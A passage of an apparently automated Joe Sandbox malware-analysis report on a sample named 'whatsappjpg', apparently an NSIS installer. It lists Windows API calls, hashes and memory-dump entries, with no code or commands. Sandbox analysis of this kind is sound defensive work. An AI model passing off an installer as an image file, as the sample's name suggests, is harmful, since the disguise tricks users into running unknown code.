                                                      • Opcode Fuzzy Hash: bf19904cbb26e83114afcd58bf256c97857e1bb2abc1c9c3e805ea3815cda1ed
                                                      • Instruction Fuzzy Hash: B711B67580021295EB303B548C40BB762F8AF54760F56803FE996772C2EB7C5C9286BD
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000400,?,?,00000021), ref: 0040252D
                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000400,?,?,00000021), ref: 00402534
                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402566
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                      • String ID: 8$C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp$C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll
                                                      • API String ID: 1453599865-328255866
                                                      • Opcode ID: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                                                      • Instruction ID: 3c80ca3e5ebaf71c7783d8616bec5f928a83f38c30d871a0748769bbcf272298
                                                      • Opcode Fuzzy Hash: d7acd23ebc5546f64b4a77e0e3a0c197fda55befd460687716db138643d5bdd5
                                                      • Instruction Fuzzy Hash: 8B019271A44204BED700AFA0DE89EAF7278EB50319F20053BF502B61D2D7BC5E41DA2E
                                                      APIs
                                                      • GetWindowLongW.USER32(?,000000EB), ref: 004041B1
                                                      • GetSysColor.USER32(00000000), ref: 004041CD
                                                      • SetTextColor.GDI32(?,00000000), ref: 004041D9
                                                      • SetBkMode.GDI32(?,?), ref: 004041E5
                                                      • GetSysColor.USER32(?), ref: 004041F8
                                                      • SetBkColor.GDI32(?,?), ref: 00404208
                                                      • DeleteObject.GDI32(?), ref: 00404222
                                                      • CreateBrushIndirect.GDI32(?), ref: 0040422C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                      • String ID:
                                                      • API String ID: 2320649405-0
                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction ID: 87ec7ba1b4d1524bc80d11c5e2deb64ad1684491122c805edd444a6dd702efce
                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                      • Instruction Fuzzy Hash: 8521C6B1904744ABC7219F68DD08B4B7BF8AF40714F048A6DF996E22E0C738E944CB25
                                                      APIs
                                                      • ReadFile.KERNEL32(?,?,?,?), ref: 004025D9
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402614
                                                      • SetFilePointer.KERNEL32(?,?,?,?,?,00000008,?,?,?,?), ref: 00402637
                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040264D
                                                        • Part of subcall function 00405BD7: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E78,0040BE78,0040330A,00409230,00409230,004031FC,00413E78,00004000,?,00000000,?), ref: 00405BEB
                                                        • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                      • String ID: 9
                                                      • API String ID: 1149667376-2366072709
                                                      • Opcode ID: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                      • Instruction ID: b7948383e8f2d929eee7054b26862d8c15f429c1db02a3f5617992bcc001f061
                                                      • Opcode Fuzzy Hash: 0aa63fe2a692f6bc31d5825d39ecadd6a947c78fcb5bd60f73af14f5e7ff11a7
                                                      • Instruction Fuzzy Hash: CE51ECB1D00219AADF24DFA4DE88AAEB779FF04304F50443BE501B62D0DB759E41CB69
                                                      APIs
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402807
                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402823
                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285C
                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040286E
                                                      • GlobalFree.KERNEL32(00000000), ref: 00402875
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288D
                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                      • String ID:
                                                      • API String ID: 3294113728-0
                                                      • Opcode ID: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                      • Instruction ID: d8d6ca7fed8381a62db75c1a7eb0a932fa2c1c5e4fe23f3949340a0d5ba681c8
                                                      • Opcode Fuzzy Hash: 611310103bc86221cecbdea3abc6fc0ade8ffeb63f35fc9d0fcc7b7ed7896cc3
                                                      • Instruction Fuzzy Hash: 4031A072C04118BBDF10AFA5CE49DAF7E79EF09364F24023AF510762E0C6795E418BA9
                                                      APIs
                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402D33
                                                      • GetTickCount.KERNEL32 ref: 00402D51
                                                      • wsprintfW.USER32 ref: 00402D7F
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00402D92,00402D92,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsd8DD2.tmp\System.dll), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7D,00000000), ref: 00402DA3
                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB1
                                                        • Part of subcall function 00402CFC: MulDiv.KERNEL32(00008000,00000064,00007B28), ref: 00402D11
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 722711167-2449383134
                                                      • Opcode ID: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
                                                      • Instruction ID: 06dbfd79dbb9e8c2a0b606a1608badac8d0e42e3594422c28149bacc2d6aa5cf
                                                      • Opcode Fuzzy Hash: b0884d8abb178ad893e14911fb0f190e16fa5082e452b5273130ec05a42c8e44
                                                      • Instruction Fuzzy Hash: AD016131945225EBD762AB60AE4DAEB7B68EF01700F14407BF845B11E1C7FC9D41CA9E
                                                      APIs
                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A77
                                                      • GetMessagePos.USER32 ref: 00404A7F
                                                      • ScreenToClient.USER32(?,?), ref: 00404A99
                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAB
                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Message$Send$ClientScreen
                                                      • String ID: f
                                                      • API String ID: 41195575-1993550816
                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction ID: 7a49535742b5819285e47484f8d523d0bdd0b2e8bbf2cce5393fd09457f71794
                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                      • Instruction Fuzzy Hash: 0C014C71E40219BADB00DBA4DD85BFEBBBCAB54711F10412ABB11B61C0D6B4AA018BA5
                                                      APIs
                                                      • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C9B
                                                      • wsprintfW.USER32 ref: 00402CCF
                                                      • SetWindowTextW.USER32(?,?), ref: 00402CDF
                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                      • API String ID: 1451636040-1158693248
                                                      • Opcode ID: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                      • Instruction ID: 136f1b4430288e91b1c5e5d445282cac07027c6a7f734139abdfd1d0af9ea11d
                                                      • Opcode Fuzzy Hash: 51bd416a2a5802dcebde0e8cf043a9bf389b7035035a475ca1d7752134760d3a
                                                      • Instruction Fuzzy Hash: C6F0127050410DABEF209F51DD49BAE3768BB00309F00843AFA16A51D0DBB95959DF59
                                                      APIs
                                                      • lstrlenW.KERNEL32(?), ref: 10002391
                                                      • GlobalAlloc.KERNEL32(00000040,00000010), ref: 100023B2
                                                      • CLSIDFromString.OLE32(?,00000000), ref: 100023BF
                                                      • GlobalAlloc.KERNEL32(00000040), ref: 100023DD
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023F8
                                                      • GlobalFree.KERNEL32(00000000), ref: 1000241A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Global$Alloc$ByteCharFreeFromMultiStringWidelstrlen
                                                      • String ID:
                                                      • API String ID: 3579998418-0
                                                      • Opcode ID: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                      • Instruction ID: d73bd5747cd055fead3767a403609930cc226346ea8e15a1dc9f8d9e67d80713
                                                      • Opcode Fuzzy Hash: 0bd45a36e3cf99e0ea36bafafcae9cc199b85f388ee9b7374409e80a5249356b
                                                      • Instruction Fuzzy Hash: AC419FB4504706EFF324DF249C94A6A77ECFB443D0F11892DF98AC6199CB34AA94CB61
                                                      APIs
                                                        • Part of subcall function 10001243: lstrcpyW.KERNEL32(00000000,?,?,?,10001534,?,10001020,10001019,?), ref: 10001260
                                                        • Part of subcall function 10001243: GlobalFree.KERNEL32 ref: 10001271
                                                      • GlobalFree.KERNEL32(?), ref: 10001928
                                                      • GlobalFree.KERNEL32(?), ref: 10001AB9
                                                      • GlobalFree.KERNEL32(?), ref: 10001ABE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FreeGlobal$lstrcpy
                                                      • String ID:
                                                      • API String ID: 176019282-0
                                                      • Opcode ID: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
                                                      • Instruction ID: 9dc2e970d319025c61fe02030ab53e3dbd452a3027dd4f32e7c9f695cea78b30
                                                      • Opcode Fuzzy Hash: 23cb6935698cfd0a96148ac87a657a1f9b0a21a4783a8882718e901bc2f46f3e
                                                      • Instruction Fuzzy Hash: D451C536F0111AEBFB10DFA488805EDB7F5FB463D0B228169E804A311CDB75AF419B92
                                                      APIs
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00402B99
                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Close$DeleteEnumOpen
                                                      • String ID:
                                                      • API String ID: 1912718029-0
                                                      • Opcode ID: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                      • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                      • Opcode Fuzzy Hash: 91a0cc9b62795f3a8a15dda2708214bc4454f5c9052d466bcbd9eea0ad329b5b
                                                      • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69
                                                      APIs
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002167,?,00000808), ref: 1000162F
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002167,?,00000808), ref: 10001636
                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002167,?,00000808), ref: 1000164A
                                                      • GetProcAddress.KERNEL32(10002167,00000000), ref: 10001651
                                                      • GlobalFree.KERNEL32(00000000), ref: 1000165A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2588491277.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000000.00000002.2588472612.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588512202.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000000.00000002.2588539508.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_10000000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                      • String ID:
                                                      • API String ID: 1148316912-0
                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                      APIs
                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580358661.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                      • String ID:
                                                      • API String ID: 1849352358-0
                                                      • Opcode ID: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                                                      • Instruction ID: d276e06630420d280db9d3d8713a95f95ab602fc4af0e03377fdcd968a8fda9f
                                                      • Opcode Fuzzy Hash: 20e8b1827cccb196a4384b85b1888191a2ee07b8269210f181c49f722f18a9f7
                                                      • Instruction Fuzzy Hash: B9F0ECB2A04104AFD701DFE4EE88CEEB7BCEB08301B100466F601F61A0D674AD018B39
                                                      APIs
                                                      • GetDC.USER32(?), ref: 00401D44
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                      • CreateFontIndirectW.GDI32(0040BD88), ref: 00401DBC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2580219915.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2580203887.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580238453.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2580254035.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
